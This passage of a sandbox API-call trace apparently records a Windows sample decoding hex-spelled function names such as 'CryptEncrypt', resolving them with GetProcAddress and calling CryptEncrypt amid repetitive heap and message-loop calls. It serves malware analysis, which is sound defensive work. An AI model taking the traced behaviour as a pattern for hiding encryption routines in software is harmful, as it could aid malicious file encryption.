out: lpMsg=0x8ceed8) returned 0 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] lstrlenW (lpString="30") returned 2 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] lstrlenW (lpString="20") returned 2 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] lstrlenW (lpString="20") returned 2 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] lstrlenW (lpString="32") returned 2 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] lstrlenW (lpString="20") returned 2 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] lstrlenW (lpString="20") returned 2 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] lstrlenW (lpString="31") returned 2 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.941] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.942] lstrlenW (lpString="20") returned 2 [0085.942] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.942] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.942] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.942] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.942] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.942] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.942] lstrlenW (lpString="20") returned 2 [0085.942] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.942] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.942] lstrlenW (lpString="36") returned 2 [0085.942] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.011] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.011] lstrlenW (lpString="20") returned 2 [0086.011] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.011] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.011] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.011] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.011] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.011] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.011] lstrlenW (lpString="62") returned 2 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] lstrlenW (lpString="79") returned 2 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] lstrlenW (lpString="74") returned 2 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] lstrlenW (lpString="65") returned 2 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] lstrlenW (lpString="5B") returned 2 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] lstrlenW (lpString="5D") returned 2 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.012] lstrlenW (lpString="20") returned 2 [0086.012] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.013] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.013] lstrlenW (lpString="31") returned 2 [0086.013] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.013] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0086.013] lstrlenW (lpString="20") returned 2 [0086.013] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.013] lstrlenW (lpString="62") returned 2 [0086.013] lstrlenW (lpString="6F") returned 2 [0086.013] lstrlenW (lpString="6F") returned 2 [0086.013] lstrlenW (lpString="6C") returned 2 [0086.013] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.013] lstrlenW (lpString="43") returned 2 [0086.013] lstrlenW (lpString="72") returned 2 [0086.013] lstrlenW (lpString="79") returned 2 [0086.013] lstrlenW (lpString="70") returned 2 [0086.013] lstrlenW (lpString="74") returned 2 [0086.013] lstrlenW (lpString="45") returned 2 [0086.013] lstrlenW (lpString="6E") returned 2 [0086.013] lstrlenW (lpString="63") returned 2 [0086.013] lstrlenW (lpString="72") returned 2 [0086.013] lstrlenW (lpString="79") returned 2 [0086.013] lstrlenW (lpString="70") returned 2 [0086.013] lstrlenW (lpString="74") returned 2 [0086.014] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.014] lstrlenW (lpString="68") returned 2 [0086.014] lstrlenW (lpString="61") returned 2 [0086.014] lstrlenW (lpString="6E") returned 2 [0086.014] lstrlenW (lpString="64") returned 2 [0086.014] lstrlenW (lpString="6C") returned 2 [0086.014] lstrlenW (lpString="65") returned 2 [0086.014] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.014] lstrlenW (lpString="68") returned 2 [0086.014] lstrlenW (lpString="61") returned 2 [0086.014] lstrlenW (lpString="6E") returned 2 [0086.014] lstrlenW (lpString="64") returned 2 [0086.014] lstrlenW (lpString="6C") returned 2 [0086.014] lstrlenW (lpString="65") returned 2 [0086.014] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.074] lstrlenW (lpString="20") returned 2 [0086.074] lstrlenW (lpString="30") returned 2 [0086.074] lstrlenW (lpString="20") returned 2 [0086.074] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.074] lstrlenW (lpString="62") returned 2 [0086.074] lstrlenW (lpString="6F") returned 2 [0086.074] lstrlenW (lpString="6F") returned 2 [0086.074] lstrlenW (lpString="6C") returned 2 [0086.074] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.074] lstrlenW (lpString="64") returned 2 [0086.074] lstrlenW (lpString="77") returned 2 [0086.074] lstrlenW (lpString="6F") returned 2 [0086.074] lstrlenW (lpString="72") returned 2 [0086.074] lstrlenW (lpString="64") returned 2 [0086.074] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.074] lstrlenW (lpString="20") returned 2 [0086.074] lstrlenW (lpString="30") returned 2 [0086.074] lstrlenW (lpString="20") returned 2 [0086.074] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.074] lstrlenW (lpString="73") returned 2 [0086.075] lstrlenW (lpString="74") returned 2 [0086.075] lstrlenW (lpString="72") returned 2 [0086.075] lstrlenW (lpString="75") returned 2 [0086.075] lstrlenW (lpString="63") returned 2 [0086.075] lstrlenW (lpString="74") returned 2 [0086.075] lstrlenW (lpString="2A") returned 2 [0086.075] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.075] lstrlenW (lpString="64") returned 2 [0086.075] lstrlenW (lpString="77") returned 2 [0086.075] lstrlenW (lpString="6F") returned 2 [0086.075] lstrlenW (lpString="72") returned 2 [0086.075] lstrlenW (lpString="64") returned 2 [0086.075] lstrlenW (lpString="2A") returned 2 [0086.075] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.075] lstrlenW (lpString="64") returned 2 [0086.075] lstrlenW (lpString="77") returned 2 [0086.075] lstrlenW (lpString="6F") returned 2 [0086.075] lstrlenW (lpString="72") returned 2 [0086.075] lstrlenW (lpString="64") returned 2 [0086.075] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.075] lstrlenW (lpString="20") returned 2 [0086.075] lstrlenW (lpString="30") returned 2 [0086.075] lstrlenW (lpString="20") returned 2 [0086.075] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.076] lstrlenW (lpString="20") returned 2 [0086.076] lstrlenW (lpString="33") returned 2 [0086.120] lstrlenW (lpString="20") returned 2 [0086.120] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.121] lstrlenW (lpString="20") returned 2 [0086.121] lstrlenW (lpString="31") returned 2 [0086.121] lstrlenW (lpString="20") returned 2 [0086.121] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.121] lstrlenW (lpString="20") returned 2 [0086.121] lstrlenW (lpString="30") returned 2 [0086.121] lstrlenW (lpString="20") returned 2 [0086.121] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.121] lstrlenW (lpString="20") returned 2 [0086.121] lstrlenW (lpString="31") returned 2 [0086.121] lstrlenW (lpString="20") returned 2 [0086.121] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.121] lstrlenW (lpString="20") returned 2 [0086.121] lstrlenW (lpString="30") returned 2 [0086.121] lstrlenW (lpString="20") returned 2 [0086.121] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0086.121] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0086.121] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0086.121] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0086.121] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0086.121] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0086.122] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.122] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.122] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aa93b8 [0086.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa93b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0086.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa93b8 | out: hHeap=0x2af0000) returned 1 [0086.122] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0086.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9388 | out: hHeap=0x2af0000) returned 1 [0086.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718b8 | out: hHeap=0x2af0000) returned 1 [0086.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77080 [0086.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71968 [0086.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717b8 [0086.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718c8 [0086.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71928 [0086.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718e8 [0086.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71938 [0086.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71968 | out: hHeap=0x2af0000) returned 1 [0086.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717b8 | out: hHeap=0x2af0000) returned 1 [0086.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718c8 | out: hHeap=0x2af0000) returned 1 [0086.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71928 | out: hHeap=0x2af0000) returned 1 [0086.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718e8 | out: hHeap=0x2af0000) returned 1 [0086.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71938 | out: hHeap=0x2af0000) returned 1 [0086.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77080 | out: hHeap=0x2af0000) returned 1 [0086.123] CryptEncrypt (in: hKey=0x9a3b40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x3faa, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x3fb0) returned 1 [0086.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0086.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77300 [0086.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71848 [0086.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0086.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0086.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9340 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718e8 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9340 | out: hHeap=0x2af0000) returned 1 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718e8 | out: hHeap=0x2af0000) returned 1 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9388 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9340 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa93a0 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa93e8 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71928 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71928 | out: hHeap=0x2af0000) returned 1 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa93e8 | out: hHeap=0x2af0000) returned 1 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9358 [0086.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71858 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9358 | out: hHeap=0x2af0000) returned 1 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71858 | out: hHeap=0x2af0000) returned 1 [0086.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0086.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa93b8 [0086.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0086.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0086.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0086.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9358 [0086.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71818 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9358 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: 